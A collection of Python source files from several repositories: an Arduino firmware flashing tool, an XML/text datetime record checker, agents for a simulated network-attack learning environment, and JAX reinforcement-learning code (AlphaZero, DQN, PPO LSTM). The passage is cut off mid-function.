```
#### File: PyArduinoFlash/scripts/arduinoflash.py
```python
VERSION = '0.2.0'
import argparse
import sys
from intelhex import IntelHex
from intelhex import AddressOverlapError, HexRecordError
from arduinobootloader import ArduinoBootloader
import progressbar
parser = argparse.ArgumentParser(description="arduino flash utility")
group = parser.add_mutually_exclusive_group()
parser.add_argument("filename", help="filename in hexadecimal Intel format")
parser.add_argument("--version", action="store_true", help="script version")
parser.add_argument("-b", "--baudrate", type=int, required=True, help="old bootolader (57600) Optiboot (115200)")
parser.add_argument("-p", "--programmer", required=True, help="programmer version - Nano (Stk500v1) Mega (Stk500v2)")
group.add_argument("-r", "--read", action="store_true", help="read the cpu flash memory")
group.add_argument("-u", "--update", action="store_true", help="update cpu flash memory")
args = parser.parse_args()
if args.version:
print("version {}".format(VERSION))
if args.update:
print("update Arduino firmware with filename: {}".format(args.filename))
elif args.read:
print("read the Arduino firmware and save in filename: {}".format(args.filename))
else:
parser.print_help()
sys.exit()
ih = IntelHex()
ab = ArduinoBootloader()
prg = ab.select_programmer(args.programmer)
if prg is None:
print("programmer version unsupported: {}".format(args.programmer))
sys.exit()
def exit_by_error(msg):
print("\nerror, {}".format(msg))
prg.leave_bootloader()
prg.close()
sys.exit(0)
if prg.open(speed=args.baudrate):
print("AVR device initialized and ready to accept instructions")
address = 0
if not prg.board_request():
exit_by_error(msg="board request")
print("bootloader: {} version: {} hardware version: {}".format(ab.programmer_name,\
ab.sw_version, ab.hw_version))
if not prg.cpu_signature():
exit_by_error(msg="cpu signature")
print("cpu name: {}".format(ab.cpu_name))
if args.update:
print("reading input file: {}".format(args.filename))
try:
ih.fromfile(args.filename, format='hex')
except FileNotFoundError:
exit_by_error(msg="file not found")
except (AddressOverlapError, HexRecordError):
exit_by_error(msg="error, file format")
print("writing flash: {} bytes".format(ih.maxaddr()))
bar = progressbar.ProgressBar(max_value=ih.maxaddr(), prefix="writing ")
bar.start(init=True)
for address in range(0, ih.maxaddr(), ab.cpu_page_size):
buffer = ih.tobinarray(start=address, size=ab.cpu_page_size)
if not prg.write_memory(buffer, address):
exit_by_error(msg="writing flash memory")
bar.update(address)
bar.finish()
dict_hex = dict()
if args.update:
max_address = ih.maxaddr()
print("reading and verifying flash memory")
elif args.read:
max_address = int(ab.cpu_page_size * ab.cpu_pages)
print("reading flash memory")
else:
max_address = 0
bar = progressbar.ProgressBar(max_value=max_address, prefix="reading ")
bar.start(init=True)
for address in range(0, max_address, ab.cpu_page_size):
read_buffer = prg.read_memory(address, ab.cpu_page_size)
if read_buffer is None:
exit_by_error(msg="reading flash memory")
if args.update:
if read_buffer != ih.tobinarray(start=address, size=ab.cpu_page_size):
exit_by_error(msg="file not match")
elif args.read:
for i in range(0, ab.cpu_page_size):
dict_hex[address + i] = read_buffer[i]
bar.update(address)
bar.finish()
if args.read:
dict_hex["start_addr"] = 0
ih.fromdict(dict_hex)
try:
ih.tofile(args.filename, 'hex')
except FileNotFoundError:
exit_by_error(msg="the file cannot be created")
print("\nflash done, thank you")
prg.leave_bootloader()
prg.close()
else:
print("error, could not connect with arduino board - baudrate: {}".format(args.baudrate))
``` |
{
"source": "jjsch-dev/xml-check-datetime",
"score": 3
} |
#### File: jjsch-dev/xml-check-datetime/xml_datetime.py
```python
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
from datetime import datetime
import argparse
import os
import platform
import json
parser = argparse.ArgumentParser(description="xml/text date time parser")
parser.add_argument('--version', action='version', version='%(prog)s 0.1.8')
parser.add_argument("-f", "--filename", required=True, help="filename, select the XML parser, when the extension is xml.")
parser.add_argument('--card_id', dest='card_id', action='store_true', help="looks for identifiers out of sequence.")
parser.add_argument('--event_code', dest='event_code', action='store_true', help="verify that the event code is accepted.")
parser.add_argument("--gen_csv", dest='gen_csv', action='store_true', help="build a csv file, with the records plus an error field.")
parser.set_defaults(car_id=False, event_code=False, gen_csv=False)
args = parser.parse_args()
dt_last = None
records = 0
invalid = []
datetime_out_sequence = []
id_out_sequence = []
invalid_event_code = []
source_dict = {}
error_fmt_numeric = False
def parse_xml(file_name, file_extension):
global records, invalid, error_fmt_numeric
try:
tree = ET.parse(file_name + file_extension)
root = tree.getroot()
if args.gen_csv:
with open("csv_format.js") as stream:
line = stream.read()
csv_format = json.loads(line)
if "error" in csv_format["fields"]:
error_fmt_numeric = False if csv_format["fields"]["error"] == "string" else True
csv_fd = csv_open(file_name)
if csv_fd is None:
print("error, the csv output file could not be created.")
exit(0)
for mark in root.findall('mark'):
card_id = int(mark.find('access_id').text)
date_time = mark.find('datetime')
source = int(mark.find("source").text)
event_code = int(mark.find("event_code").text)
year = int(date_time.find('year').text)
month = int(date_time.find('month').text)
day = int(date_time.find('day').text)
hour = int(date_time.find('hour').text)
minute = int(date_time.find('minute').text)
seconds = int(date_time.find('seconds').text)
records += 1
error = check_datetime(card_id=card_id, year=year, month=month,
day=day, hour=hour, minute=minute, seconds=seconds)
if args.card_id:
error += check_card_id(card_id=card_id, source=source)
if args.event_code:
error += check_event_code(card_id=card_id, event_code=event_code)
if args.gen_csv:
csv_append(fd=csv_fd, card_id=card_id, year=year, month=month,
day=day, hour=hour, minute=minute, seconds=seconds,
source=source, event_code=event_code, error=error,
layout=csv_format)
if args.gen_csv:
csv_close(fd=csv_fd)
except FileNotFoundError:
print("error, file not found")
def check_datetime(card_id, year, month, day, hour, minute, seconds):
global dt_last, invalid, datetime_out_sequence, records, error_fmt_numeric
error = ""
str_log = "mark:{} id:{} year:{} "\
"month:{} day:{} hour:{} "\
"minute:{} seconds: {}".format(records,
card_id,
year,
month,
day,
hour,
minute,
seconds)
try:
dt = datetime(year=int(year), month=int(month),
day=int(day), hour=int(hour),
minute=int(minute), second=int(seconds))
if dt_last is None:
dt_last = dt
elif dt < dt_last:
datetime_out_sequence.append(str_log)
error = '2' if error_fmt_numeric else "date_sequence"
dt_last = dt
except ValueError:
invalid.append(str_log)
error = '3' if error_fmt_numeric else "dt_invalid"
return error
def check_card_id(card_id, source):
global source_dict, records, error_fmt_numeric
error = ''
if source in source_dict:
last_id = source_dict[source]
if int(card_id) != int(last_id) + 1:
id_out_sequence.append("mark: {} id: {} source :{}".format(records, card_id, source))
error = ' 4' if error_fmt_numeric else ' id_sequence'
source_dict[source] = card_id
return error
def check_event_code(card_id, event_code):
global invalid_event_code, error_fmt_numeric
if event_code != 1:
invalid_event_code.append("mark: {} id: {} event_code :{}".format(records, card_id, event_code))
return ' 5' if error_fmt_numeric else ' event_code'
return ''
def parse_text(name):
global records, invalid
try:
with open(name) as f:
lines = f.readlines() # list containing lines of file
for line in lines:
line = line.strip() # remove leading/trailing white spaces
columns = [item.strip() for item in line.split(' ')]
dt = columns[1].split('/')
tm = columns[2].split(':')
records += 1
check_datetime(card_id=columns[0],
year=dt[2], month=dt[1], day=dt[0],
hour=tm[0], minute=tm[1], seconds=tm[2])
except FileNotFoundError:
print("error file not found")
def csv_open(file_name):
try:
return open(file_name + ".csv", 'w')
except FileNotFoundError:
return None
except PermissionError:
return None
def csv_append(fd, card_id, year, month, day, hour, minute, seconds, source, event_code, error, layout):
global error_fmt_numeric
if len(error) == 0:
error = "1" if error_fmt_numeric else "ok"
fields = layout["fields"]
for item in fields:
if item == 'index':
fd.write(fields[item].format(records))
elif item == "card_id":
fd.write(fields[item].format(card_id))
elif item == "source":
fd.write(fields[item].format(source))
elif item == "event_code":
fd.write(fields[item].format(event_code))
elif item == "error":
fd.write(error.lstrip(' '))
elif item == "date":
date = fields[item]
for x in date:
if x == "month":
fd.write(date[x].format(month))
elif x == "year":
fd.write(date[x].format(year))
elif x == "day":
fd.write(date[x].format(day))
if x != list(date)[-1] and x != "sep":
fd.write(date["sep"])
elif item == "time":
date = fields[item]
for x in date:
if x == "hour":
fd.write(date[x].format(hour))
elif x == "minute":
fd.write(date[x].format(minute))
elif x == "seconds":
fd.write(date[x].format(seconds))
if x != list(date)[-1] and x != "sep":
fd.write(date["sep"])
if item != list(fields)[-1]:
fd.write(layout["sep"])
fd.write("\n")
def csv_close(fd):
fd.close
if __name__ == '__main__':
print("\nos: {} - arch: {} - cpu: {}\n".format(platform.system(),
platform.architecture(),
platform.processor()))
file_name, file_extension = os.path.splitext(args.filename)
if file_extension == ".xml":
parse_xml(file_name, file_extension)
elif file_extension == ".txt":
parse_text(args.filename)
else:
print("error, invalid file extension: {}".format(file_extension))
exit(0)
if len(invalid):
print("invalid datetime\n")
for item in invalid:
print(item)
if len(datetime_out_sequence):
print("\ndatetime out of sequence\n")
for item in datetime_out_sequence:
print(item)
if len(id_out_sequence):
print("\nid out of sequence\n")
for item in id_out_sequence:
print(item)
if len(invalid_event_code):
print("\ninvalid event code\n")
for item in invalid_event_code:
print(item)
print("\nfrom {} records, {} have invalid datetime, "
"{} dates are out of sequence, "
"{} id out of sequence and "
"{} invalid event code".format(records,
len(invalid),
len(datetime_out_sequence),
len(id_out_sequence),
len(invalid_event_code)))
``` |
{
"source": "Jjschwartz/CyberAttackSimulator",
"score": 3
} |
#### File: nasim/agents/bruteforce_agent.py
```python
from itertools import product
import nasim
LINE_BREAK = "-"*60
def run_bruteforce_agent(env, step_limit=1e6, verbose=True):
"""Run bruteforce agent on nasim environment.
Parameters
----------
env : nasim.NASimEnv
the nasim environment to run agent on
step_limit : int, optional
the maximum number of steps to run agent for (default=1e6)
verbose : bool, optional
whether to print out progress messages or not (default=True)
Returns
-------
int
timesteps agent ran for
float
the total reward recieved by agent
bool
whether the goal was reached or not
"""
if verbose:
print(LINE_BREAK)
print("STARTING EPISODE")
print(LINE_BREAK)
print("t: Reward")
env.reset()
total_reward = 0
done = False
steps = 0
cycle_complete = False
if env.flat_actions:
act = 0
else:
act_iter = product(*[range(n) for n in env.action_space.nvec])
while not done and steps < step_limit:
if env.flat_actions:
act = (act + 1) % env.action_space.n
cycle_complete = (steps > 0 and act == 0)
else:
try:
act = next(act_iter)
cycle_complete = False
except StopIteration:
act_iter = product(*[range(n) for n in env.action_space.nvec])
act = next(act_iter)
cycle_complete = True
_, rew, done, _ = env.step(act)
total_reward += rew
if cycle_complete and verbose:
print(f"{steps}: {total_reward}")
steps += 1
if done and verbose:
print(LINE_BREAK)
print("EPISODE FINISHED")
print(LINE_BREAK)
print(f"Goal reached = {env.goal_reached()}")
print(f"Total steps = {steps}")
print(f"Total reward = {total_reward}")
elif verbose:
print(LINE_BREAK)
print("STEP LIMIT REACHED")
print(LINE_BREAK)
if done:
done = env.goal_reached()
return steps, total_reward, done
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("env_name", type=str, help="benchmark scenario name")
parser.add_argument("-s", "--seed", type=int, default=0,
help="random seed")
parser.add_argument("-o", "--partially_obs", action="store_true",
help="Partially Observable Mode")
parser.add_argument("-p", "--param_actions", action="store_true",
help="Use Parameterised action space")
parser.add_argument("-f", "--box_obs", action="store_true",
help="Use 2D observation space")
args = parser.parse_args()
nasimenv = nasim.make_benchmark(
args.env_name,
args.seed,
not args.partially_obs,
not args.param_actions,
not args.box_obs
)
if not args.param_actions:
print(nasimenv.action_space.n)
else:
print(nasimenv.action_space.nvec)
run_bruteforce_agent(nasimenv)
```
#### File: nasim/agents/keyboard_agent.py
```python
import nasim
from nasim.envs.action import Exploit, PrivilegeEscalation
LINE_BREAK = "-"*60
LINE_BREAK2 = "="*60
def print_actions(action_space):
for a in range(action_space.n):
print(f"{a} {action_space.get_action(a)}")
print(LINE_BREAK)
def choose_flat_action(env):
print_actions(env.action_space)
while True:
try:
idx = int(input("Choose action number: "))
action = env.action_space.get_action(idx)
print(f"Performing: {action}")
return action
except Exception:
print("Invalid choice. Try again.")
def display_actions(actions):
action_names = list(actions)
for i, name in enumerate(action_names):
a_def = actions[name]
output = [f"{i} {name}:"]
output.extend([f"{k}={v}" for k, v in a_def.items()])
print(" ".join(output))
def choose_item(items):
while True:
try:
idx = int(input("Choose number: "))
return items[idx]
except Exception:
print("Invalid choice. Try again.")
def choose_param_action(env):
print("1. Choose Action Type:")
print("----------------------")
for i, atype in enumerate(env.action_space.action_types):
print(f"{i} {atype.__name__}")
while True:
try:
atype_idx = int(input("Choose index: "))
# check idx valid
atype = env.action_space.action_types[atype_idx]
break
except Exception:
print("Invalid choice. Try again.")
print("------------------------")
print("2. Choose Target Subnet:")
print("------------------------")
num_subnets = env.action_space.nvec[1]
while True:
try:
subnet = int(input(f"Choose subnet in [1, {num_subnets}]: "))
if subnet < 1 or subnet > num_subnets:
raise ValueError()
break
except Exception:
print("Invalid choice. Try again.")
print("----------------------")
print("3. Choose Target Host:")
print("----------------------")
num_hosts = env.scenario.subnets[subnet]
while True:
try:
host = int(input(f"Choose host in [0, {num_hosts-1}]: "))
if host < 0 or host > num_hosts-1:
raise ValueError()
break
except Exception:
print("Invalid choice. Try again.")
# subnet-1, since action_space handles exclusion of internet subnet
avec = [atype_idx, subnet-1, host, 0, 0]
if atype not in (Exploit, PrivilegeEscalation):
action = env.action_space.get_action(avec)
print("----------------")
print(f"ACTION SELECTED: {action}")
return action
target = (subnet, host)
if atype == Exploit:
print("------------------")
print("4. Choose Exploit:")
print("------------------")
exploits = env.scenario.exploits
display_actions(exploits)
e_name = choose_item(list(exploits))
action = Exploit(name=e_name, target=target, **exploits[e_name])
else:
print("------------------")
print("4. Choose Privilege Escalation:")
print("------------------")
privescs = env.scenario.privescs
display_actions(privescs)
pe_name = choose_item(list(privescs))
action = PrivilegeEscalation(
name=pe_name, target=target, **privescs[pe_name]
)
print("----------------")
print(f"ACTION SELECTED: {action}")
return action
def choose_action(env):
input("Press enter to choose next action..")
print("\n" + LINE_BREAK2)
print("CHOOSE ACTION")
print(LINE_BREAK2)
if env.flat_actions:
return choose_flat_action(env)
return choose_param_action(env)
def run_keyboard_agent(env, render_mode="readable"):
"""Run Keyboard agent
Parameters
----------
env : NASimEnv
the environment
render_mode : str, optional
display mode for environment (default="readable")
Returns
-------
int
final return
int
steps taken
bool
whether goal reached or not
"""
print(LINE_BREAK2)
print("STARTING EPISODE")
print(LINE_BREAK2)
o = env.reset()
env.render(render_mode)
total_reward = 0
total_steps = 0
done = False
while not done:
a = choose_action(env)
o, r, done, _ = env.step(a)
total_reward += r
total_steps += 1
print("\n" + LINE_BREAK2)
print("OBSERVATION RECIEVED")
print(LINE_BREAK2)
env.render(render_mode)
print(f"Reward={r}")
print(f"Done={done}")
print(LINE_BREAK)
if done:
done = env.goal_reached()
return total_reward, total_steps, done
def run_generative_keyboard_agent(env, render_mode="readable"):
"""Run Keyboard agent in generative mode.
The experience is the same as the normal mode, this is mainly useful
for testing.
Parameters
----------
env : NASimEnv
the environment
render_mode : str, optional
display mode for environment (default="readable")
Returns
-------
int
final return
int
steps taken
bool
whether goal reached or not
"""
print(LINE_BREAK2)
print("STARTING EPISODE")
print(LINE_BREAK2)
o = env.reset()
s = env.current_state
env.render_state(render_mode, s)
env.render(render_mode, o)
total_reward = 0
total_steps = 0
done = False
while not done:
a = choose_action(env)
ns, o, r, done, _ = env.generative_step(s, a)
total_reward += r
total_steps += 1
print(LINE_BREAK2)
print("NEXT STATE")
print(LINE_BREAK2)
env.render_state(render_mode, ns)
print("\n" + LINE_BREAK2)
print("OBSERVATION RECIEVED")
print(LINE_BREAK2)
env.render(render_mode, o)
print(f"Reward={r}")
print(f"Done={done}")
print(LINE_BREAK)
s = ns
if done:
done = env.goal_reached()
return total_reward, total_steps, done
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("env_name", type=str,
help="benchmark scenario name")
parser.add_argument("-s", "--seed", type=int, default=None,
help="random seed (default=None)")
parser.add_argument("-o", "--partially_obs", action="store_true",
help="Partially Observable Mode")
parser.add_argument("-p", "--param_actions", action="store_true",
help="Use Parameterised action space")
parser.add_argument("-g", "--use_generative", action="store_true",
help=("Generative environment mode. This makes no"
" difference for the player, but is useful"
" for testing."))
args = parser.parse_args()
env = nasim.make_benchmark(args.env_name,
args.seed,
fully_obs=not args.partially_obs,
flat_actions=not args.param_actions,
flat_obs=True)
if args.use_generative:
total_reward, steps, goal = run_generative_keyboard_agent(env)
else:
total_reward, steps, goal = run_keyboard_agent(env)
print(LINE_BREAK2)
print("EPISODE FINISHED")
print(LINE_BREAK)
print(f"Goal reached = {goal}")
print(f"Total reward = {total_reward}")
print(f"Steps taken = {steps}")
```
#### File: nasim/agents/random_agent.py
```python
import numpy as np
import nasim
LINE_BREAK = "-"*60
def run_random_agent(env, step_limit=1e6, verbose=True):
if verbose:
print(LINE_BREAK)
print("STARTING EPISODE")
print(LINE_BREAK)
print(f"t: Reward")
env.reset()
total_reward = 0
done = False
t = 0
a = 0
while not done and t < step_limit:
a = env.action_space.sample()
_, r, done, _ = env.step(a)
total_reward += r
if (t+1) % 100 == 0 and verbose:
print(f"{t}: {total_reward}")
t += 1
if done and verbose:
print(LINE_BREAK)
print("EPISODE FINISHED")
print(LINE_BREAK)
print(f"Total steps = {t}")
print(f"Total reward = {total_reward}")
elif verbose:
print(LINE_BREAK)
print("STEP LIMIT REACHED")
print(LINE_BREAK)
if done:
done = env.goal_reached()
return t, total_reward, done
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("env_name", type=str,
help="benchmark scenario name")
parser.add_argument("-s", "--seed", type=int, default=0,
help="random seed")
parser.add_argument("-r", "--runs", type=int, default=1,
help="number of random runs to perform (default=1)")
parser.add_argument("-o", "--partially_obs", action="store_true",
help="Partially Observable Mode")
parser.add_argument("-p", "--param_actions", action="store_true",
help="Use Parameterised action space")
parser.add_argument("-f", "--box_obs", action="store_true",
help="Use 2D observation space")
args = parser.parse_args()
seed = args.seed
run_steps = []
run_rewards = []
run_goals = 0
for i in range(args.runs):
env = nasim.make_benchmark(args.env_name,
seed,
not args.partially_obs,
not args.param_actions,
not args.box_obs)
steps, reward, done = run_random_agent(env, verbose=False)
run_steps.append(steps)
run_rewards.append(reward)
run_goals += int(done)
seed += 1
if args.runs > 1:
print(f"Run {i}:")
print(f"\tSteps = {steps}")
print(f"\tReward = {reward}")
print(f"\tGoal reached = {done}")
run_steps = np.array(run_steps)
run_rewards = np.array(run_rewards)
print(LINE_BREAK)
print("Random Agent Runs Complete")
print(LINE_BREAK)
print(f"Mean steps = {run_steps.mean():.2f} +/- {run_steps.std():.2f}")
print(f"Mean rewards = {run_rewards.mean():.2f} "
f"+/- {run_rewards.std():.2f}")
print(f"Goals reached = {run_goals} / {args.runs}")
``` |
{
"source": "Jjschwartz/rljaxforfun",
"score": 3
} |
#### File: rljaxff/alpha_zero/agent.py
```python
from typing import Mapping
import jax
import jax.numpy as jnp
import numpy as np
import optax
from absl import logging
from rljaxff import parts
from rljaxff.alpha_zero import mcts as mcts_lib
from rljaxff.alpha_zero import memory as memory_lib
class AlphaZero(parts.Agent):
"""An Alpha zero agent """
def __init__(self,
mcts: mcts_lib.MCTS,
sample_network_input,
network: parts.Network,
optimizer: optax.GradientTransformation,
replay: memory_lib.AlphaZeroReplay,
batch_size: int,
min_replay_capacity: int,
learn_period: int,
rng_key: parts.PRNGKey):
self._mcts = mcts
self._replay = replay
self._batch_size = batch_size
self._min_replay_capacity = min_replay_capacity
self._learn_period = learn_period
# Network stuff
self._rng_key, net_key = jax.random.split(rng_key) # type: ignore
self._params = network.init(net_key, sample_network_input[None, ...])
self._opt_state = optimizer.init(self._params)
# Agent state stuff
self._action: parts.Action = 0
self._frame_t = -1
self._statistics = {
'state_value': np.nan,
'loss_value': np.nan
}
def loss_fn(params: parts.NetworkParams,
transitions,
rng_key: parts.PRNGKey):
_, apply_key = jax.random.split(rng_key)
predictions = network.apply(
params, rng=apply_key, inputs=transitions.s_t)
predicted_v_t = jnp.squeeze(predictions.value)
v_loss = jnp.mean((predicted_v_t - transitions.v_t)**2)
pi_loss = jnp.mean(-jnp.sum(
transitions.pi_t * jnp.log(1e-8*predictions.action_probs)
))
# The paper also adds an L2 weight regularizer penalty
# Gonna ignore that for now
return v_loss + pi_loss
def update(rng_key: parts.PRNGKey,
opt_state,
params: parts.NetworkParams,
transitions):
rng_key, update_key = jax.random.split(rng_key) # type: ignore
loss_value, d_loss_d_params = jax.value_and_grad(loss_fn)(
params, transitions, update_key
)
updates, new_opt_state = optimizer.update(
d_loss_d_params, opt_state
)
new_params = optax.apply_updates(params, updates)
return rng_key, new_opt_state, new_params, loss_value
self._update = jax.jit(update)
def step(self, timestep: parts.Timestep) -> parts.Action:
self._frame_t += 1
action = self._action = self._act(timestep)
if self._replay.size < self._min_replay_capacity:
return action
if self._frame_t % self._learn_period == 0:
self._learn()
return action
def reset(self) -> None:
self._action = 0
def _act(self, timestep: parts.Timestep) -> parts.Action:
if timestep.first():
# new episode
self._mcts.reset(timestep.observation, self._params)
else:
self._mcts.update(self._action, timestep.observation, self._params)
if timestep.last():
pi_t = np.zeros(2) # this will not be used for training or acting
v_t = 0.0 if timestep.reward is None else timestep.reward
a_t = 0
else:
pi_t, v_t = self._mcts.search(self._params, self.temperature)
a_t = np.random.choice(len(pi_t), p=pi_t)
self._replay.add(memory_lib.AlphaZeroReplayStructure(
s_t=timestep.observation,
v_t=0.0 if timestep.reward is None else timestep.reward,
pi_t=pi_t,
last_step=timestep.last()
))
self._statistics['state_value'] = v_t
return a_t
def _learn(self):
logging.log_first_n(logging.INFO, 'Begin learning', 1)
transitions = self._replay.sample(self._batch_size)
self._rng_key, self._opt_state, self._params, loss = self._update(
self._rng_key, self._opt_state, self._params, transitions
)
self._statistics["loss_value"] = jax.device_get(loss)
@property
def statistics(self) -> Mapping[str, float]:
return self._statistics
@property
def temperature(self) -> float:
"""Exploration temperature for MCTS search """
return 1.0
```
#### File: rljaxff/alpha_zero/network_test.py
```python
import sys
import jax
import jax.numpy as jnp
import chex
import numpy as np
import haiku as hk
from absl.testing import absltest
import rljaxff.alpha_zero.network as net_lib
# pylint: disable=missing-class-docstring
# pylint: disable=missing-function-docstring
# pylint: disable=protected-access
def _sample_input(input_shape):
return jnp.zeros((1,) + input_shape, dtype=jnp.float32)
class AZNetworkTest(absltest.TestCase):
def setUp(self):
self.input_size = (6, )
self.num_actions = 3
self.hidden_sizes = [5, 4]
self.seed = 0
random_state = np.random.RandomState(self.seed)
self.rng_key = jax.random.PRNGKey(
random_state.randint(
-sys.maxsize - 1, sys.maxsize + 1, dtype=np.int64
)
)
network_fn = net_lib.alphazero_network(
self.hidden_sizes, self.num_actions
)
self.network = hk.transform(network_fn)
def test_init(self):
params = self.network.init(
self.rng_key, _sample_input(self.input_size)
)
self.assertLen(params, 2*len(self.hidden_sizes))
def test_apply(self):
inputs = _sample_input(self.input_size)
params = self.network.init(
self.rng_key, _sample_input(self.input_size)
)
output = self.network.apply(params, self.rng_key, inputs)
chex.assert_shape(output.value[0], (1, ))
chex.assert_shape(output.action_probs[0], (self.num_actions, ))
def test_apply_batch(self):
batch_size = 8
inputs = jnp.zeros((batch_size,) + self.input_size, dtype=jnp.float32)
params = self.network.init(
self.rng_key, _sample_input(self.input_size)
)
outputs = self.network.apply(params, self.rng_key, inputs)
chex.assert_shape(outputs.value, (batch_size, 1))
chex.assert_shape(outputs.action_probs, (batch_size, self.num_actions))
if __name__ == "__main__":
absltest.main()
```
#### File: rljaxff/dqn/run_gym.py
```python
import sys
import itertools
import gym
import jax
from jax.config import config
import numpy as np
import haiku as hk
from absl import app
from absl import flags
from absl import logging
import optax
from rljaxff import parts
from rljaxff.dqn import agent
from rljaxff import replay as replay_lib
FLAGS = flags.FLAGS
flags.DEFINE_string('environment_name', 'CartPole-v0', '')
flags.DEFINE_multi_integer('hidden_size', 64, '')
flags.DEFINE_integer('replay_capacity', int(1e5), '')
flags.DEFINE_float('min_replay_capacity_fraction', 0.00001, '')
flags.DEFINE_integer('batch_size', 32, '')
flags.DEFINE_integer('max_frames_per_episode', 1024, '')
flags.DEFINE_float('exploration_epsilon_begin_value', 1., '')
flags.DEFINE_float('exploration_epsilon_end_value', 0.1, '')
flags.DEFINE_float('exploration_epsilon_decay_frame_fraction', 0.01, '')
flags.DEFINE_integer('target_network_update_period', int(1e3), '')
flags.DEFINE_float('learning_rate', 0.001, '')
flags.DEFINE_float('optimizer_epsilon', 0.01 / 32**2, '')
flags.DEFINE_float('additional_discount', 0.99, '')
flags.DEFINE_integer('seed', 1, '') # GPU may introduce nondeterminism.
flags.DEFINE_integer('num_iterations', 200, '')
flags.DEFINE_integer('num_train_frames', int(1e4), '') # Per iteration.
flags.DEFINE_integer('learn_period', 1, '')
flags.DEFINE_float('grad_error_bound', 1. / 4, '')
flags.DEFINE_float('discount', 0.9, '')
def main(argv):
"""Trains DQN agent on Gym environment """
del argv
logging.info(
'DQN on OpenAI Gym on %s.', jax.lib.xla_bridge.get_backend().platform
)
random_state = np.random.RandomState(FLAGS.seed)
rng_key = jax.random.PRNGKey(
random_state.randint(-sys.maxsize - 1, sys.maxsize + 1, dtype=np.int64)
)
def environment_builder():
"""Environment creation function """
return gym.make(FLAGS.environment_name)
env = environment_builder()
logging.info('Environment: %s', FLAGS.environment_name)
logging.info('Action spec: %s', env.action_space)
logging.info('Observation spec: %s', env.observation_space)
assert isinstance(env.action_space, gym.spaces.Discrete)
assert isinstance(env.observation_space, gym.spaces.Box)
assert len(env.observation_space.shape) == 1
num_actions = env.action_space.n
def network_fn(inputs):
mlp = hk.nets.MLP([*FLAGS.hidden_size, num_actions])
return mlp(inputs)
network = hk.transform(network_fn)
sample_network_input = env.reset()
decay_steps = int(
FLAGS.exploration_epsilon_decay_frame_fraction
* FLAGS.num_iterations
* FLAGS.num_train_frames
)
exploration_epsilon_schedule = parts.LinearSchedule(
begin_value=FLAGS.exploration_epsilon_begin_value,
end_value=FLAGS.exploration_epsilon_end_value,
begin_t=int(FLAGS.min_replay_capacity_fraction*FLAGS.replay_capacity),
decay_steps=decay_steps
)
replay_structure = parts.Transition(
s_tm1=None, a_tm1=None, r_t=None, discount_t=None, s_t=None
)
replay = replay_lib.TransitionReplay(
FLAGS.replay_capacity,
replay_structure,
random_state
)
optimizer = optax.adam(FLAGS.learning_rate)
train_rng_key, eval_rng_key = jax.random.split(rng_key)
train_agent = agent.DQN(
sample_network_input=sample_network_input,
network=network,
optimizer=optimizer,
transition_accumulator=replay_lib.TransitionAccumulator(),
replay=replay,
batch_size=FLAGS.batch_size,
exploration_epsilon=exploration_epsilon_schedule,
min_replay_capacity_fraction=FLAGS.min_replay_capacity_fraction,
learn_period=FLAGS.learn_period,
target_network_update_period=FLAGS.target_network_update_period,
grad_error_bound=FLAGS.grad_error_bound,
rng_key=train_rng_key
)
iteration = 0
env = environment_builder()
while iteration <= FLAGS.num_iterations:
logging.info('Training iteration %d', iteration)
train_seq = parts.run_loop(
train_agent, env, FLAGS.max_frames_per_episode
)
train_seq_truncated = itertools.islice(
train_seq, FLAGS.num_train_frames
)
train_trackers = parts.make_default_trackers(train_agent)
train_stats = parts.generate_statistics(
train_trackers, train_seq_truncated
)
log_output = [
('iteration', iteration, '%3d'),
('frame', iteration * FLAGS.num_train_frames, '%5d'),
('train_num_episodes', train_stats['num_episodes'], '%5d'),
('train_episode_return', train_stats['episode_return'], '%2.2f'),
('train_state_value', train_stats['state_value'], '%.3f'),
('train_loss_value', train_stats['loss_value'], '%.3f'),
('train_epsilon', train_agent.exploration_epsilon, '%2.2f')
]
log_output_str = ', '.join(
('%s: ' + f) % (n, v) for n, v, f in log_output
)
logging.info(log_output_str)
iteration += 1
if __name__ == "__main__":
config.update('jax_platform_name', 'gpu')
config.update('jax_numpy_rank_promotion', 'raise')
config.config_with_absl()
app.run(main)
```
#### File: rljaxff/po_ppo/network.py
```python
from typing import List, NamedTuple, Callable
import haiku as hk
import jax
import jax.numpy as jnp
import rljaxff.networks as net_lib
class PPONetworkOutputs(NamedTuple):
"""Output from PPO network """
pi_logits: jnp.ndarray
value: jnp.ndarray
class PPOLSTMNetwork(NamedTuple):
"""A convenience wrapper around Haiku transformations of PPO LSTM Network
Has 3 functions:
- apply(params, inputs, prev_state) -> PPONetworkOutput, (hk.LSTMState, ..)
this runs a forward pass of PPOLSTMNetwork
- init(rng_key, sample_input, sample_state) -> hk.Params
this returns the initial model parameters
- initial_state(batch_size) -> (hk.LSTMState, ..)
get the initial state of the network
"""
apply: Callable
init: Callable
initial_state: Callable
def ppo_lstm_network(lstm_sizes: List[int],
action_head_hidden_sizes: List[int],
value_head_hidden_sizes: List[int],
num_actions: int) -> net_lib.NetworkFn:
"""PPO LSTM """
def net_fn(inputs, prev_state):
lstm_layers = []
for size in lstm_sizes:
lstm_layers.append(hk.LSTM(size))
lstm_layers.append(jax.nn.relu)
lstm_core = hk.DeepRNN(lstm_layers)
inputs, next_state = lstm_core(inputs, prev_state)
# policy head
action_inputs = hk.nets.MLP(action_head_hidden_sizes)(inputs)
action_logits = net_lib.linear(num_actions)(action_inputs)
# value head
value_inputs = hk.nets.MLP(value_head_hidden_sizes)(inputs)
value = net_lib.linear(1)(value_inputs)
output = PPONetworkOutputs(pi_logits=action_logits, value=value)
return output, next_state
return net_fn
def ppo_lstm_init_state(lstm_sizes: List[int]):
"""Function for getting the LSTM state for the PPO LSTM network """
def initial_state_fn(batch_size):
lstm_layers = []
for size in lstm_sizes:
lstm_layers.append(hk.LSTM(size))
lstm_layers.append(jax.nn.relu)
lstm_core = hk.DeepRNN(lstm_layers)
# don't need to worry about the action and value heads since they
# contribute nothing to the LSTMState
return lstm_core.initial_state(batch_size)
return initial_state_fn
def make_ppo_lstm_network(lstm_sizes: List[int],
action_head_hidden_sizes: List[int],
value_head_hidden_sizes: List[int],
num_actions: int) -> PPOLSTMNetwork:
"""Get the hk.Transformed PPO LSTM Network """
net_fn = ppo_lstm_network(
lstm_sizes,
action_head_hidden_sizes,
